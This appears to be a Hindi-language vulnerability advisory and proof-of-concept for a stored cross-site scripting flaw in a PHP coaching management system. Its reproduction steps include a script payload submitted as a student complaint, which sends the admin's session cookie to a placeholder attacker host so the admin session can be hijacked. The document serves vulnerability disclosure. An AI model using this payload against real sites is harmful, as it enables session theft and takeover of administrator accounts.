
प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट PHP कोचिंग प्रबंधन प्रणाली में संग्रहीत XSS (CWE-79) के लिए, जो कुकी चोरी के माध्यम से सत्र अपहरण और छात्र से व्यवस्थापक तक विशेषाधिकार वृद्धि का प्रदर्शन करता है।
PHP में कोचिंग प्रबंधन प्रणाली (Code-Projects.org) https://code-projects.org/coaching-management-system-in-php-with-source-code/
अज्ञात (विक्रेता द्वारा संस्करण जानकारी प्रदान नहीं की गई; अप्रैल 2026 तक Code-Projects.org से उपलब्ध नवीनतम संस्करण पर परीक्षण किया गया)
CWE-79: वेब पेज जनरेशन के दौरान इनपुट का अनुचित न्यूट्रलाइज़ेशन (संग्रहीत क्रॉस-साइट स्क्रिप्टिंग)
एप्लिकेशन शिकायत और उत्तर कार्यक्षमता में उपयोगकर्ता द्वारा आपूर्ति किए गए इनपुट को ठीक से सैनिटाइज़ करने में विफल रहता है। कम-विशेषाधिकार वाले उपयोगकर्ता द्वारा इंजेक्ट किया गया दुर्भावनापूर्ण JavaScript संग्रहीत हो जाता है और व्यवस्थापक या शिक्षक जैसे उच्च-विशेषाधिकार वाले उपयोगकर्ताओं द्वारा देखे जाने पर निष्पादित होता है।
इसके अतिरिक्त, उत्तर कार्यक्षमता भी कमजोर है, जो व्यवस्थापकों या शिक्षकों को JavaScript इंजेक्ट करने की अनुमति देती है जो छात्र सत्रों में निष्पादित होती है।
इसके परिणामस्वरूप संग्रहीत XSS भेद्यता उत्पन्न होती है जो कई उपयोगकर्ता भूमिकाओं को प्रभावित करती है।
छात्र के रूप में लॉगिन करें
नेविगेट करें:
/modules/student/complaint.php

निम्नलिखित पेलोड के साथ एक शिकायत सबमिट करें:
<script>
new Image().src="http://ATTACKER-IP:PORT/?c="+document.cookie;
</script>

व्यवस्थापक के रूप में लॉगिन करें
नेविगेट करें:
/modules/admin/incomingcomplaint.php

जब व्यवस्थापक शिकायत देखता है, तो पेलोड स्वचालित रूप से निष्पादित होता है
व्यवस्थापक सत्र कुकी हमलावर-नियंत्रित सर्वर पर भेजी जाती है
व्यवस्थापक सत्र को हाईजैक करने के लिए चुराई गई सत्र कुकी का उपयोग करें

गंभीरता: CRITICAL